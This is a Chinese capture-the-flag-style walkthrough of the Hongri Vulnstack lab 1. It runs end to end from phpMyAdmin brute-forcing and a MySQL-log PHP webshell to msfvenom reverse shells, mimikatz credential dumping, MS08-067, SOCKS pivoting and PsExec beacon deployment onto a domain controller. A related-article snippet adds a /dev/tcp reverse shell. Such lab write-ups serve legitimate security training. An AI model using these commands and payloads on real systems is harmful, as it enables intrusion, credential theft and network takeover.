红日靶场1实战经验

2023-12-23 09:00
文章标签 靶场 实战经验 红日

本文主要是介绍红日靶场1实战经验,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

红日靶场一

  • 0x00前言
  • 0x01环境搭建
  • 0x02web渗透
    • 1 信息收集
      • 1.1探测内网存活
      • 1.2端口扫描
      • 1.2.1 masscan扫描
      • 1.2.2 nmap扫描
      • 1.2.3 访问80端口
      • 1.2.4 目录爆破 看还存在扫描页面
        • 服务漏洞利用思路
    • 2 漏洞利用
      • 2.1 探测phpmyadmin页面
      • 2.1 phpmyadmin漏洞利用
        • 2.1.1 看是否可以写入文件
        • 2.1.2 尝试用日志写入木马getshell
        • 2.1.3 蚁剑连接
    • 3 拿下webshell后信息收集
      • 3.1 是否存在域
      • 3.2 网络连接情况 进程 杀软 服务 是否可以出网 用户开放情况
      • 3.3 翻文件 txt 类型的 看是否有密码
  • 0x03后渗透
    • 1.msf上线
    • 2.msf信息收集
    • 3.提权
    • 4.抓取域用户的密码信息
    • 5.知道密码后 可以通过3389连接
      • 5.1 检查3389是否开启
    • 6 跨网段横向渗透
      • 6.1 msf socks4a proxychains 穿透内网
      • 6.2测试是否成功
      • 6.3 登录后 进行域内信息收集
    • 7 跨网段主机信息收集
      • 7.1 内网存活主机探测
      • 7.2 内网存活主机端口扫描
      • 7.3 内网存活主机服务探测
    • 8.横向渗透
      • 8.1 MS08_067拿下域成员服务器
      • 8.2 拿下域控
        • 8.2.1 msf派生给cs
        • 8.2.2 cs基于web服务器生成监听器
        • 8.2.3 psexec攻击


0x00前言

靶场地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
感谢红日团队提供的靶场
靶机初始密码 均为 hongrisec@2019


0x01环境搭建

VMwareWorkstation搭建

攻击机		kali	ip	 192.168.157.137
web服务器	win7	ip	 192.168.157.153	192.168.52.143
域成员		win2003	ip	 					192.168.52.141
域控			win2008	ip						192.168.52.138

win7 web虚拟机 开启 phpstudy服务

网络拓扑如下

在这里插入图片描述

0x02web渗透

1 信息收集

1.1探测内网存活

netdiscover -i eth0 -r 192.168.157.0/24

在这里插入图片描述
192.168.157.153为目标机器ip

1.2端口扫描

masscan扫描速度快 可先用masscan扫描开放的端口
再用nmap扫描详细信息

1.2.1 masscan扫描

masscan 192.168.157.153 -p 1-65535 --rate=1000
如果是真实机 会存在rate过高可能会被封,可以调低一点
在这里插入图片描述
扫出80和3306端口

1.2.2 nmap扫描

nmap -sC -sV -p 80,3306 192.168.157.153 -o 192.168.157.153.txt
在这里插入图片描述
开启 80 和3306
可以看到 是phpstudy 搭建的

1.2.3 访问80端口

是一个phpstudy探针页面
可以看到 服务器信息 网站路径
在这里插入图片描述

1.2.4 目录爆破 看还存在扫描页面

使用御剑目录扫描进行目录爆破
或者kali自带的 dirbuster在这里插入图片描述
扫出phpmyadmin 页面

服务漏洞利用思路

如果 可以登录进去 就可以 执行数据库命令 。
权限够的话
可以 通过 写入 一句话木马文件, into outfile into dumpfile
或者开启日志记录,写入一句话木马 进行连接。

2 漏洞利用

2.1 探测phpmyadmin页面

访问成功
尝试 暴力破解登录
如下两图
在这里插入图片描述

在这里插入图片描述
爆破出弱口令 root root

select user() 命令 为 root用户登录
在这里插入图片描述

2.1 phpmyadmin漏洞利用

2.1.1 看是否可以写入文件
mysql   into写入文件:使用需看要secure_file_priv的值。value为“null”时,不允许读取任意文件value为其余路径时,表示该路径可以读写文件value为“空”时,允许读取任意文件用show global variables like '%secure%' 命令查看

在这里插入图片描述
为NULL不可写入文件
要想修改 Value值 只能通过配置文件 mysql.ini 修改
放弃

2.1.2 尝试用日志写入木马getshell

开启mysql日志功能:

	1.查看日志功能是否开启show global variables like '%general%'2.未开启的话设置为 onset global general_log='ON'3.开启后将日志文件的存储位置改为可访问到的目录, 根目录即可set global  general_log_file = 'C:/phpStudy1/WWW/3.php'4.执行下边一句话木马 数据库将会将查询语句保存在日志文件中SELECT '<?php @eval($_POST["cmd"]); ?>'5.写入成功后 使用蚁剑连接

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
均执行成功

2.1.3 蚁剑连接

在这里插入图片描述
在这里插入图片描述
连接webshell成功

3 拿下webshell后信息收集

3.1 是否存在域

判断方法
1.whoami hostname   对比
2.ipconfig /all 看DNS
3.systeminfo  看是否有域一栏

在这里插入图片描述
在这里插入图片描述

3.2 网络连接情况 进程 杀软 服务 是否可以出网 用户开放情况

1.ipconfig 看所处网段是否有多个
2.netstat -ano 查看网络连接和开放端口
3.net start  查看启动的服务  用于提权
4.tasklist   查看开启的进程
5.tasklist /SVC 复制到在线杀软识别 看存在的杀软情况  https://i.hacking8.com/tiquan
6. ping baidu  看是否可以出网等 
7. net user   存在用户

3.3 翻文件 txt 类型的 看是否有密码

后续补充

因为在域内 所以 有必要进行后渗透 拿下域控

0x03后渗透

1.msf上线

生成exe木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.157.137 LPORT=2333 -f exe > hack.exe 
开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 2333
set lhost 192.168.157.137
exploit -j

在这里插入图片描述

将生成的exe木马通过蚁剑上传到 目标服务器 执行
在这里插入图片描述
在这里插入图片描述

成功上线
在这里插入图片描述

可输入 ?查看 可执行的命令

在这里插入图片描述

2.msf信息收集

1.msf arp 发现主机  开机状态下才可探测出 我现在只开了ip141的 所以下图只扫出141run arp_scanner -r  192.168.52.0/242.run post/multi/recon/local_exploit_suggester      查看msf的提权

在这里插入图片描述

在这里插入图片描述

3.提权

getuid查看服务器权限
getsystem 提权
getuid 查看是否提权成功

在这里插入图片描述

4.抓取域用户的密码信息

以下3种都可尝试
1.ruan hashdump
2.加载 kiwi模块
load kiwi     加载kiwi模块
creds_all    列出所有凭据
3.加载mimikatz模块
Windows10/2012 以下的版本可以直接抓取明文密码再尝试加载 mimikatz 模块,加载模块前需要先将meterpreter迁移到64位的进程,而且该进程也需要 是system权限运行的。 ps 查看进程
migrate PID 
load mimikatz 
mimikatz_command -f sekurlsa::searchPasswords

在这里插入图片描述

在这里插入图片描述

5.知道密码后 可以通过3389连接

5.1 检查3389是否开启

nmap -p 3389 192.168.157.153
filtered 被过滤 应该是 防火墙阻拦
在这里插入图片描述### 4.2开启3389
run post/windows/manage/enable_rdp
再次扫描已经开启
在这里插入图片描述
在这里插入图片描述

6 跨网段横向渗透

6.1 msf socks4a proxychains 穿透内网

添加路由
1. run autoroute -s 192.168.52.0/24		添加路由
2. run autorout -p       查看是否添加成功 
3. background           返回
4. route print			输出路由
5. use auxiliary/server/socks4a		使用 socks4a模块
6. set srvport 1080		设置端口1080
7. run		运行

在这里插入图片描述
添加成功

在这里插入图片描述

配置 kali socks代理
配置proxychains:

vi /etc/proxychains.conf 

在这里插入图片描述

6.2测试是否成功

proxychains curl 192.168.52.143
访问成功 说明 代理添加成功
Proxychains nmap -sT -Pn 192.168.52.143

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

6.3 登录后 进行域内信息收集

net time /domain        #查看时间服务器
net user /domain        #查看域用户
net view /domain        #查看有几个域
net view /domain:GOD  #查看GOD	域情况
nslookup  主机名	 		#查看域内其他主机  可能ip查不出来
net group "domain computers" /domain         #查看域内所有的主机名
net group "domain admins"   /domain          #查看域管理员
net group "domain controllers" /domain       #查看域控

7 跨网段主机信息收集

7.1 内网存活主机探测

auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机

7.2 内网存活主机端口扫描

proxychains nmap -Pn -sT 192.168.52.141
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(默认扫描1-10000)

在这里插入图片描述

7.3 内网存活主机服务探测

auxiliary/scanner/ftp/ftp_version            #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version            #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version      #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp                #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version          #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title                 #探测内网http服务的标题
auxiliary/scanner/smb/smb_version            #发现内网smb服务,基于默认的445端口   
auxiliary/scanner/mssql/mssql_schemadump     #发现内网SQLServer服务,基于默认的1433端口
auxiliary/scanner/oracle/oracle_hashdump     #发现内网oracle服务,基于默认的1521端口 
auxiliary/scanner/mysql/mysql_version        #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner            #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server         #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version            #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname             #探测内网主机的netbios名字

8.横向渗透

8.1 MS08_067拿下域成员服务器

MS08-067漏洞将会影响除Windows Server 2008 Core以下的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

use exploit/windows/smb/ms08_067_netapi
set rhost 192.168.52.141
set payload windows/meterpreter/bind_tcp
run

在这里插入图片描述
不稳定会掉
也会出现弹窗
在这里插入图片描述

8.2 拿下域控

8.2.1 msf派生给cs
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http 
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新 的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true 
set lhost 192.168.157.137 #cobaltstrike监听的ip 
set lport 14444 #cobaltstrike监听的端口 
set session 1 #这里是获得的session的id 
exploit

在这里插入图片描述
在这里插入图片描述

cs上线成功

8.2.2 cs基于web服务器生成监听器

在这里插入图片描述

8.2.3 psexec攻击
Psexec针对远程建立连接的方式有两种,一种先建立IPC通道连接,然后直接使用,操作如下:
net use \\192.168.0.1\ipc$ “password” /user:administrator
psexec.exe \\192.168.0.1 cmd                   进入半交互式cmdshell  ;
另一种时在psexec的参数中指定账户密码    操作如下:
psexec.exe \\192.168.0.1 –u administrator –p password
命令参考
https://www.cnblogs.com/wuyuan2011woaini/p/9561122.html

通过蚁剑上传psexec64.exe 到web服务器

web执行 psexec命令

1.#上传木马文件
PsExec64.exe -accepteula \\192.168.52.138 -u god\administrator -p hongrisec@2020 -d -c C:\windows\temp\beacon64.exe
2.#打开 域控cmd  并执行 上线
PsExec64.exe -accepteula \\192.168.52.138 -u god\administrator -p hongrisec@2020 -s cmd
cd..                 #返回到上级 c:/windows目录
dir | findstr beacon		#看是否上传beacon32.exe成功
beacon64.exe				#执行

命令1上传木马
如上图显示这样就上传成功可以 连接cmd查看 c:\wndows目录下 是否存在 存在就执行

命令2连接cmd执行

发现并未上线。
思考原因

因为使用的是 反向连接的木马 
可以web服务器关闭防火墙 或者 开启 监听端口 
NetSh Advfirewall set allprofiles state off  #关闭防火墙
Netsh Advfirewall show allprofiles            #查看防火墙状态
域控服务器执行exe后,反向链接192.168.52.143 的 55555端口 
而 web服务器 防火墙处于开启状态,可以放开 55555端口 在运行看是否上线成功
web服务器输入以下命令开启 或者手动开启
netsh advfirewall firewall add rule name="beacon" dir=in protocol=tcp localport=55555 action=allow

关闭后在运行
成功上线

在这里插入图片描述

拿下域控

在这里插入图片描述

这篇关于红日靶场1实战经验的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/527468

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

Tomato靶场渗透测试

1.扫描靶机地址 可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了 2.打开网站 3.进行目录扫描 dirb    http://172.16.1.113 发现有一个antibot_image目录 4.访问这个目录 可以看到有一个info.php 5.查看页面源代码 可以发现可以进行get传参 6.尝试查看日志文件 http://172.16

攻防世界 —— 靶场笔记合集

靶场地址:https://adworld.xctf.org.cn/ 备注:此为靶场笔记合集的目录,是我接下来待更新的内容(主要是因为主线一篇太耗时间了,所以开通一条支线,来满足我日更两篇的目标,当该靶场更新完毕后,此条注释会删除) 0x01:Misc 0x02:Pwn 0x03:Web 0x0301:Web - Level 1 0x04:Reverse 0x05:Crypto

【靶场】upload-labs-master(前11关)

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】upload-labs-master(前11关) 第一关 Pass-01第二关 Pass-02第三关 Pass-03第四关 Pass-04第五关 Pass-05第六关 Pass-06第七关 Pass-07第八关 Pass-08第九关 Pass-09第十关 Pass-10第

pikachu文件包含漏洞靶场通关攻略

本地文件包含 先上传一个jpg文件,内容写上<?php phpinfo();?> 上传成功并且知晓了文件的路径 返回本地上传,并../返回上级目录 可以看到我们的php语句已经生效 远程文件包含 在云服务器上创建一个php文件 然后打开pikachu的远程文件包含靶场,随便选一个提交 在filename处修改为云服务器的目标地址 127.0.0.1/pik

【靶场】CTFshow—vip限免题目11~20

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】CTFshow—vip限免题目11~20 域名txt记录泄露敏感信息公布内部技术文档泄露编辑器配置不当密码逻辑脆弱探针泄露CDN穿透js敏感信息泄露前端密钥泄露数据库恶意下载 域名txt记录泄露 提示:域名其实也可以隐藏信息,比如ctfshow.com 就